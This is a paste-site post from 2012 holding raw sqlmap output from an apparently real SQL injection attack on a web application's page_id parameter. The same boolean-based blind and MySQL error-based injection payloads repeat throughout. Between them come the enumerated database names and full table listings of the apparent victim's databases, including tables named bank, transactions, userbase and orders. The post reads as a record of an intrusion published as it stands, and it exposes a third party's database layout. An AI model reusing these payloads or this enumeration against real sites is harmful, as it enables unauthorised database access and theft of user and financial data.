
Untitled

By: Multiplexor on Jan 6th, 2012  |  syntax: SQL  |  size: 34.96 KB  |  views: 1,180  |  expires: Never
  1.  #     #                                                                
  2.  ##   ## #    # #      ##### # #####  #      ###### #    #  ####  #####  
  3.  # # # # #    # #        #   # #    # #      #       #  #  #    # #    #
  4.  #  #  # #    # #        #   # #    # #      #####    ##   #    # #    #
  5.  #     # #    # #        #   # #####  #      #        ##   #    # #####  
  6.  #     # #    # #        #   # #      #      #       #  #  #    # #   #  
  7.  #     #  ####  ######   #   # #      ###### ###### #    #  ####  #    #          
  8.  
  9.  
  10.  
  11. sqlmap IDENTIFIED the following injection points WITH a total OF 28 HTTP(s) requests:
  12. ---
  13. Place: GET
  14. Parameter: page_id
  15.     TYPE: boolean-based blind
  16.     Title: AND boolean-based blind - WHERE OR HAVING clause
  17.     Payload: page_id=28167956 AND 1228=1228
  18.  
  19.     TYPE: error-based
  20.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  21.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  22. ---
  23.  
  24. available DATABASES [9]:
  25. [*] information_schema
  26. [*] mysql
  27. [*] orcataco_bumperstic
  28. [*] orcataco_officerjones
  29. [*] orcataco_officerjones_1
  30. [*] orcataco_officerjones_2
  31. [*] orcataco_snap
  32. [*] signedbump
  33. [*] test
  34.  
  35. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  36. ---
  37. Place: GET
  38. Parameter: page_id
  39.     TYPE: boolean-based blind
  40.     Title: AND boolean-based blind - WHERE OR HAVING clause
  41.     Payload: page_id=28167956 AND 1228=1228
  42.  
  43.     TYPE: error-based
  44.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  45.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  46. ---
  47.  
  48. DATABASE: mysql
  49. [17 TABLES]
  50. +---------------------------+
  51. | columns_priv              |
  52. | db                        |
  53. | func                      |
  54. | help_category             |
  55. | help_keyword              |
  56. | help_relation             |
  57. | help_topic                |
  58. | host                      |
  59. | proc                      |
  60. | procs_priv                |
  61. | tables_priv               |
  62. | time_zone                 |
  63. | time_zone_leap_second     |
  64. | time_zone_name            |
  65. | time_zone_transition      |
  66. | time_zone_transition_type |
  67. | user                      |
  68. +---------------------------+
  69.  
  70. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  71. ---
  72. Place: GET
  73. Parameter: page_id
  74.     TYPE: boolean-based blind
  75.     Title: AND boolean-based blind - WHERE OR HAVING clause
  76.     Payload: page_id=28167956 AND 1228=1228
  77.  
  78.     TYPE: error-based
  79.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  80.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  81. ---
  82.  
  83. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  84. ---
  85. Place: GET
  86. Parameter: page_id
  87.     TYPE: boolean-based blind
  88.     Title: AND boolean-based blind - WHERE OR HAVING clause
  89.     Payload: page_id=28167956 AND 1228=1228
  90.  
  91.     TYPE: error-based
  92.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  93.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  94. ---
  95.  
  96. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  97. ---
  98. Place: GET
  99. Parameter: page_id
  100.     TYPE: boolean-based blind
  101.     Title: AND boolean-based blind - WHERE OR HAVING clause
  102.     Payload: page_id=28167956 AND 1228=1228
  103.  
  104.     TYPE: error-based
  105.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  106.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  107. ---
  108.  
  109. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  110. ---
  111. Place: GET
  112. Parameter: page_id
  113.     TYPE: boolean-based blind
  114.     Title: AND boolean-based blind - WHERE OR HAVING clause
  115.     Payload: page_id=28167956 AND 1228=1228
  116.  
  117.     TYPE: error-based
  118.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  119.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  120. ---
  121.  
  122. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  123. ---
  124. Place: GET
  125. Parameter: page_id
  126.     TYPE: boolean-based blind
  127.     Title: AND boolean-based blind - WHERE OR HAVING clause
  128.     Payload: page_id=28167956 AND 1228=1228
  129.  
  130.     TYPE: error-based
  131.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  132.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  133. ---
  134.  
  135. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  136. ---
  137. Place: GET
  138. Parameter: page_id
  139.     TYPE: boolean-based blind
  140.     Title: AND boolean-based blind - WHERE OR HAVING clause
  141.     Payload: page_id=28167956 AND 1228=1228
  142.  
  143.     TYPE: error-based
  144.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  145.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  146. ---
  147.  
  148. available DATABASES [9]:
  149. [*] information_schema
  150. [*] mysql
  151. [*] orcataco_bumperstic
  152. [*] orcataco_officerjones
  153. [*] orcataco_officerjones_1
  154. [*] orcataco_officerjones_2
  155. [*] orcataco_snap
  156. [*] signedbump
  157. [*] test
  158.  
  159. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  160. ---
  161. Place: GET
  162. Parameter: page_id
  163.     TYPE: boolean-based blind
  164.     Title: AND boolean-based blind - WHERE OR HAVING clause
  165.     Payload: page_id=28167956 AND 1228=1228
  166.  
  167.     TYPE: error-based
  168.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  169.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  170. ---
  171.  
  172. DATABASE: orcataco_bumperstic
  173. [113 TABLES]
  174. +--------------------------+
  175. | _settings                |
  176. | bank                     |
  177. | basket_items             |
  178. | basket_orders            |
  179. | basket_tags              |
  180. | baskets                  |
  181. | brands                   |
  182. | bsuids                   |
  183. | categories               |
  184. | clickemail               |
  185. | clickwizard              |
  186. | comment                  |
  187. | counters                 |
  188. | counters_i12             |
  189. | counters_i24             |
  190. | counters_o12             |
  191. | counters_o24             |
  192. | emailsendlog             |
  193. | favorite_orders          |
  194. | feedback                 |
  195. | game                     |
  196. | game_score               |
  197. | hm_events                |
  198. | hm_message_queue         |
  199. | invited                  |
  200. | invited_from_force       |
  201. | item_book                |
  202. | item_tags                |
  203. | items                    |
  204. | line_items               |
  205. | logadd                   |
  206. | logcontacts              |
  207. | loggiftclick             |
  208. | logimport                |
  209. | loginvite                |
  210. | loginvited               |
  211. | logvalidate              |
  212. | logwizard                |
  213. | motd                     |
  214. | notified                 |
  215. | notify_off               |
  216. | occasions                |
  217. | orders                   |
  218. | orders_non_facebook      |
  219. | page_items               |
  220. | played                   |
  221. | post_install_items       |
  222. | post_install_items_v2    |
  223. | profile_settings         |
  224. | public_pages             |
  225. | publish_stream_sgnonpred |
  226. | purchase                 |
  227. | quicksender              |
  228. | recent_users             |
  229. | reply_from_hist          |
  230. | requests_sent            |
  231. | rpd_by_day               |
  232. | sendqueue                |
  233. | sendsthisweek            |
  234. | sendsthisweek2           |
  235. | sent                     |
  236. | settings                 |
  237. | stream_posts             |
  238. | survey_answers           |
  239. | survey_questions         |
  240. | tag_stats                |
  241. | tags                     |
  242. | temp_birthday_orders     |
  243. | temp_click_events        |
  244. | temp_daily_stats         |
  245. | temp_despicable_me       |
  246. | temp_funnel_test_orders  |
  247. | temp_hourly_stats        |
  248. | temp_invite_stats        |
  249. | temp_invite_stats_v2     |
  250. | temp_item_recs2          |
  251. | temp_nectar_ads          |
  252. | temp_nectar_stats_v2     |
  253. | temp_order_clicks        |
  254. | temp_page_counter        |
  255. | temp_page_visits         |
  256. | temp_premium_orders      |
  257. | temp_request_demo_stats  |
  258. | temp_request_stats       |
  259. | temp_retention_daily     |
  260. | temp_retention_weekly    |
  261. | temp_sendgroup_members   |
  262. | temp_sendgroup_sends     |
  263. | temp_test_order_users    |
  264. | temp_test_orders         |
  265. | temp_tutorial_stages     |
  266. | temp_user_credits        |
  267. | temp_userbase            |
  268. | theme_tag_map            |
  269. | theme_tags               |
  270. | themes                   |
  271. | themes_user_gen          |
  272. | transactions             |
  273. | uids                     |
  274. | unlocked                 |
  275. | unopened                 |
  276. | unsent                   |
  277. | unsubscribe              |
  278. | user_country             |
  279. | user_groups              |
  280. | user_items               |
  281. | user_pages               |
  282. | user_pageviews           |
  283. | user_pageviews_v2        |
  284. | user_themes              |
  285. | userbase                 |
  286. | winner                   |
  287. | wishlist                 |
  288. +--------------------------+
  289.  
  290. DATABASE: test
  291. [21 TABLES]
  292. +------------------------+
  293. | TempTable              |
  294. | appinfo                |
  295. | autoincr               |
  296. | cur                    |
  297. | deals                  |
  298. | errorcounts            |
  299. | errorfromfirst1000     |
  300. | install_metrics        |
  301. | installs_by_day        |
  302. | installs_by_invite_day |
  303. | invited_from_force     |
  304. | invites_by_day         |
  305. | invites_by_newuser_day |
  306. | ret_users2             |
  307. | retlog                 |
  308. | rpdbyda                |
  309. | send_log               |
  310. | uids                   |
  311. | user_country           |
  312. | x                      |
  313. | y                      |
  314. +------------------------+
  315.  
  316. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  317. ---
  318. Place: GET
  319. Parameter: page_id
  320.     TYPE: boolean-based blind
  321.     Title: AND boolean-based blind - WHERE OR HAVING clause
  322.     Payload: page_id=28167956 AND 1228=1228
  323.  
  324.     TYPE: error-based
  325.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  326.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  327. ---
  328.  
  329. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  330. ---
  331. Place: GET
  332. Parameter: page_id
  333.     TYPE: boolean-based blind
  334.     Title: AND boolean-based blind - WHERE OR HAVING clause
  335.     Payload: page_id=28167956 AND 1228=1228
  336.  
  337.     TYPE: error-based
  338.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  339.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  340. ---
  341.  
  342. DATABASE: test
  343. [21 TABLES]
  344. +------------------------+
  345. | TempTable              |
  346. | appinfo                |
  347. | autoincr               |
  348. | cur                    |
  349. | deals                  |
  350. | errorcounts            |
  351. | errorfromfirst1000     |
  352. | install_metrics        |
  353. | installs_by_day        |
  354. | installs_by_invite_day |
  355. | invited_from_force     |
  356. | invites_by_day         |
  357. | invites_by_newuser_day |
  358. | ret_users2             |
  359. | retlog                 |
  360. | rpdbyda                |
  361. | send_log               |
  362. | uids                   |
  363. | user_country           |
  364. | x                      |
  365. | y                      |
  366. +------------------------+
  367.  
  368. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  369. ---
  370. Place: GET
  371. Parameter: page_id
  372.     TYPE: boolean-based blind
  373.     Title: AND boolean-based blind - WHERE OR HAVING clause
  374.     Payload: page_id=28167956 AND 1228=1228
  375.  
  376.     TYPE: error-based
  377.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  378.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  379. ---
  380.  
  381. DATABASE: orcataco_bumperstic
  382. [113 TABLES]
  383. +--------------------------+
  384. | _settings                |
  385. | bank                     |
  386. | basket_items             |
  387. | basket_orders            |
  388. | basket_tags              |
  389. | baskets                  |
  390. | brands                   |
  391. | bsuids                   |
  392. | categories               |
  393. | clickemail               |
  394. | clickwizard              |
  395. | comment                  |
  396. | counters                 |
  397. | counters_i12             |
  398. | counters_i24             |
  399. | counters_o12             |
  400. | counters_o24             |
  401. | emailsendlog             |
  402. | favorite_orders          |
  403. | feedback                 |
  404. | game                     |
  405. | game_score               |
  406. | hm_events                |
  407. | hm_message_queue         |
  408. | invited                  |
  409. | invited_from_force       |
  410. | item_book                |
  411. | item_tags                |
  412. | items                    |
  413. | line_items               |
  414. | logadd                   |
  415. | logcontacts              |
  416. | loggiftclick             |
  417. | logimport                |
  418. | loginvite                |
  419. | loginvited               |
  420. | logvalidate              |
  421. | logwizard                |
  422. | motd                     |
  423. | notified                 |
  424. | notify_off               |
  425. | occasions                |
  426. | orders                   |
  427. | orders_non_facebook      |
  428. | page_items               |
  429. | played                   |
  430. | post_install_items       |
  431. | post_install_items_v2    |
  432. | profile_settings         |
  433. | public_pages             |
  434. | publish_stream_sgnonpred |
  435. | purchase                 |
  436. | quicksender              |
  437. | recent_users             |
  438. | reply_from_hist          |
  439. | requests_sent            |
  440. | rpd_by_day               |
  441. | sendqueue                |
  442. | sendsthisweek            |
  443. | sendsthisweek2           |
  444. | sent                     |
  445. | settings                 |
  446. | stream_posts             |
  447. | survey_answers           |
  448. | survey_questions         |
  449. | tag_stats                |
  450. | tags                     |
  451. | temp_birthday_orders     |
  452. | temp_click_events        |
  453. | temp_daily_stats         |
  454. | temp_despicable_me       |
  455. | temp_funnel_test_orders  |
  456. | temp_hourly_stats        |
  457. | temp_invite_stats        |
  458. | temp_invite_stats_v2     |
  459. | temp_item_recs2          |
  460. | temp_nectar_ads          |
  461. | temp_nectar_stats_v2     |
  462. | temp_order_clicks        |
  463. | temp_page_counter        |
  464. | temp_page_visits         |
  465. | temp_premium_orders      |
  466. | temp_request_demo_stats  |
  467. | temp_request_stats       |
  468. | temp_retention_daily     |
  469. | temp_retention_weekly    |
  470. | temp_sendgroup_members   |
  471. | temp_sendgroup_sends     |
  472. | temp_test_order_users    |
  473. | temp_test_orders         |
  474. | temp_tutorial_stages     |
  475. | temp_user_credits        |
  476. | temp_userbase            |
  477. | theme_tag_map            |
  478. | theme_tags               |
  479. | themes                   |
  480. | themes_user_gen          |
  481. | transactions             |
  482. | uids                     |
  483. | unlocked                 |
  484. | unopened                 |
  485. | unsent                   |
  486. | unsubscribe              |
  487. | user_country             |
  488. | user_groups              |
  489. | user_items               |
  490. | user_pages               |
  491. | user_pageviews           |
  492. | user_pageviews_v2        |
  493. | user_themes              |
  494. | userbase                 |
  495. | winner                   |
  496. | wishlist                 |
  497. +--------------------------+
  498.  
  499. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  500. ---
  501. Place: GET
  502. Parameter: page_id
  503.     TYPE: boolean-based blind
  504.     Title: AND boolean-based blind - WHERE OR HAVING clause
  505.     Payload: page_id=28167956 AND 1228=1228
  506.  
  507.     TYPE: error-based
  508.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  509.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  510. ---
  511.  
  512. DATABASE: orcataco_bumperstic
  513. [113 TABLES]
  514. +--------------------------+
  515. | _settings                |
  516. | bank                     |
  517. | basket_items             |
  518. | basket_orders            |
  519. | basket_tags              |
  520. | baskets                  |
  521. | brands                   |
  522. | bsuids                   |
  523. | categories               |
  524. | clickemail               |
  525. | clickwizard              |
  526. | comment                  |
  527. | counters                 |
  528. | counters_i12             |
  529. | counters_i24             |
  530. | counters_o12             |
  531. | counters_o24             |
  532. | emailsendlog             |
  533. | favorite_orders          |
  534. | feedback                 |
  535. | game                     |
  536. | game_score               |
  537. | hm_events                |
  538. | hm_message_queue         |
  539. | invited                  |
  540. | invited_from_force       |
  541. | item_book                |
  542. | item_tags                |
  543. | items                    |
  544. | line_items               |
  545. | logadd                   |
  546. | logcontacts              |
  547. | loggiftclick             |
  548. | logimport                |
  549. | loginvite                |
  550. | loginvited               |
  551. | logvalidate              |
  552. | logwizard                |
  553. | motd                     |
  554. | notified                 |
  555. | notify_off               |
  556. | occasions                |
  557. | orders                   |
  558. | orders_non_facebook      |
  559. | page_items               |
  560. | played                   |
  561. | post_install_items       |
  562. | post_install_items_v2    |
  563. | profile_settings         |
  564. | public_pages             |
  565. | publish_stream_sgnonpred |
  566. | purchase                 |
  567. | quicksender              |
  568. | recent_users             |
  569. | reply_from_hist          |
  570. | requests_sent            |
  571. | rpd_by_day               |
  572. | sendqueue                |
  573. | sendsthisweek            |
  574. | sendsthisweek2           |
  575. | sent                     |
  576. | settings                 |
  577. | stream_posts             |
  578. | survey_answers           |
  579. | survey_questions         |
  580. | tag_stats                |
  581. | tags                     |
  582. | temp_birthday_orders     |
  583. | temp_click_events        |
  584. | temp_daily_stats         |
  585. | temp_despicable_me       |
  586. | temp_funnel_test_orders  |
  587. | temp_hourly_stats        |
  588. | temp_invite_stats        |
  589. | temp_invite_stats_v2     |
  590. | temp_item_recs2          |
  591. | temp_nectar_ads          |
  592. | temp_nectar_stats_v2     |
  593. | temp_order_clicks        |
  594. | temp_page_counter        |
  595. | temp_page_visits         |
  596. | temp_premium_orders      |
  597. | temp_request_demo_stats  |
  598. | temp_request_stats       |
  599. | temp_retention_daily     |
  600. | temp_retention_weekly    |
  601. | temp_sendgroup_members   |
  602. | temp_sendgroup_sends     |
  603. | temp_test_order_users    |
  604. | temp_test_orders         |
  605. | temp_tutorial_stages     |
  606. | temp_user_credits        |
  607. | temp_userbase            |
  608. | theme_tag_map            |
  609. | theme_tags               |
  610. | themes                   |
  611. | themes_user_gen          |
  612. | transactions             |
  613. | uids                     |
  614. | unlocked                 |
  615. | unopened                 |
  616. | unsent                   |
  617. | unsubscribe              |
  618. | user_country             |
  619. | user_groups              |
  620. | user_items               |
  621. | user_pages               |
  622. | user_pageviews           |
  623. | user_pageviews_v2        |
  624. | user_themes              |
  625. | userbase                 |
  626. | winner                   |
  627. | wishlist                 |
  628. +--------------------------+
  629.  
  630. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  631. ---
  632. Place: GET
  633. Parameter: page_id
  634.     TYPE: boolean-based blind
  635.     Title: AND boolean-based blind - WHERE OR HAVING clause
  636.     Payload: page_id=28167956 AND 1228=1228
  637.  
  638.     TYPE: error-based
  639.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  640.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  641. ---
  642.  
  643. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  644. ---
  645. Place: GET
  646. Parameter: page_id
  647.     TYPE: boolean-based blind
  648.     Title: AND boolean-based blind - WHERE OR HAVING clause
  649.     Payload: page_id=28167956 AND 1228=1228
  650.  
  651.     TYPE: error-based
  652.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  653.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  654. ---
  655.  
  656. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  657. ---
  658. Place: GET
  659. Parameter: page_id
  660.     TYPE: boolean-based blind
  661.     Title: AND boolean-based blind - WHERE OR HAVING clause
  662.     Payload: page_id=28167956 AND 1228=1228
  663.  
  664.     TYPE: error-based
  665.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  666.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  667. ---
  668.  
  669. DATABASE: orcataco_bumperstic
  670. [113 TABLES]
  671. +--------------------------+
  672. | _settings                |
  673. | bank                     |
  674. | basket_items             |
  675. | basket_orders            |
  676. | basket_tags              |
  677. | baskets                  |
  678. | brands                   |
  679. | bsuids                   |
  680. | categories               |
  681. | clickemail               |
  682. | clickwizard              |
  683. | comment                  |
  684. | counters                 |
  685. | counters_i12             |
  686. | counters_i24             |
  687. | counters_o12             |
  688. | counters_o24             |
  689. | emailsendlog             |
  690. | favorite_orders          |
  691. | feedback                 |
  692. | game                     |
  693. | game_score               |
  694. | hm_events                |
  695. | hm_message_queue         |
  696. | invited                  |
  697. | invited_from_force       |
  698. | item_book                |
  699. | item_tags                |
  700. | items                    |
  701. | line_items               |
  702. | logadd                   |
  703. | logcontacts              |
  704. | loggiftclick             |
  705. | logimport                |
  706. | loginvite                |
  707. | loginvited               |
  708. | logvalidate              |
  709. | logwizard                |
  710. | motd                     |
  711. | notified                 |
  712. | notify_off               |
  713. | occasions                |
  714. | orders                   |
  715. | orders_non_facebook      |
  716. | page_items               |
  717. | played                   |
  718. | post_install_items       |
  719. | post_install_items_v2    |
  720. | profile_settings         |
  721. | public_pages             |
  722. | publish_stream_sgnonpred |
  723. | purchase                 |
  724. | quicksender              |
  725. | recent_users             |
  726. | reply_from_hist          |
  727. | requests_sent            |
  728. | rpd_by_day               |
  729. | sendqueue                |
  730. | sendsthisweek            |
  731. | sendsthisweek2           |
  732. | sent                     |
  733. | settings                 |
  734. | stream_posts             |
  735. | survey_answers           |
  736. | survey_questions         |
  737. | tag_stats                |
  738. | tags                     |
  739. | temp_birthday_orders     |
  740. | temp_click_events        |
  741. | temp_daily_stats         |
  742. | temp_despicable_me       |
  743. | temp_funnel_test_orders  |
  744. | temp_hourly_stats        |
  745. | temp_invite_stats        |
  746. | temp_invite_stats_v2     |
  747. | temp_item_recs2          |
  748. | temp_nectar_ads          |
  749. | temp_nectar_stats_v2     |
  750. | temp_order_clicks        |
  751. | temp_page_counter        |
  752. | temp_page_visits         |
  753. | temp_premium_orders      |
  754. | temp_request_demo_stats  |
  755. | temp_request_stats       |
  756. | temp_retention_daily     |
  757. | temp_retention_weekly    |
  758. | temp_sendgroup_members   |
  759. | temp_sendgroup_sends     |
  760. | temp_test_order_users    |
  761. | temp_test_orders         |
  762. | temp_tutorial_stages     |
  763. | temp_user_credits        |
  764. | temp_userbase            |
  765. | theme_tag_map            |
  766. | theme_tags               |
  767. | themes                   |
  768. | themes_user_gen          |
  769. | transactions             |
  770. | uids                     |
  771. | unlocked                 |
  772. | unopened                 |
  773. | unsent                   |
  774. | unsubscribe              |
  775. | user_country             |
  776. | user_groups              |
  777. | user_items               |
  778. | user_pages               |
  779. | user_pageviews           |
  780. | user_pageviews_v2        |
  781. | user_themes              |
  782. | userbase                 |
  783. | winner                   |
  784. | wishlist                 |
  785. +--------------------------+
  786.  
  787. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  788. ---
  789. Place: GET
  790. Parameter: page_id
  791.     TYPE: boolean-based blind
  792.     Title: AND boolean-based blind - WHERE OR HAVING clause
  793.     Payload: page_id=28167956 AND 1228=1228
  794.  
  795.     TYPE: error-based
  796.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  797.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  798. ---
  799.  
  800. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  801. ---
  802. Place: GET
  803. Parameter: page_id
  804.     TYPE: boolean-based blind
  805.     Title: AND boolean-based blind - WHERE OR HAVING clause
  806.     Payload: page_id=28167956 AND 1228=1228
  807.  
  808.     TYPE: error-based
  809.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  810.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  811. ---
  812.  
  813. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  814. ---
  815. Place: GET
  816. Parameter: page_id
  817.     TYPE: boolean-based blind
  818.     Title: AND boolean-based blind - WHERE OR HAVING clause
  819.     Payload: page_id=28167956 AND 1228=1228
  820.  
  821.     TYPE: error-based
  822.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  823.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  824. ---
  825.  
  826. help [1]:
  827.  
  828. wget txt [1]:
  829.  
  830. ? [1]:
  831.  
  832. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  833. ---
  834. Place: GET
  835. Parameter: page_id
  836.     TYPE: boolean-based blind
  837.     Title: AND boolean-based blind - WHERE OR HAVING clause
  838.     Payload: page_id=28167956 AND 1228=1228
  839.  
  840.     TYPE: error-based
  841.     Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
  842.     Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  843. ---
  844.  
  845. sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
  846. ---
  847. Place: GET
  848. Parameter: page_id
  849.     TYPE: boolean-based blind
  850.     Title: AND boolean-based blind - WHERE OR HAVING clause
  851.     Payload: page_id=28167956 AND 1228=1228
  852.  
  853.     TYPE: error-based
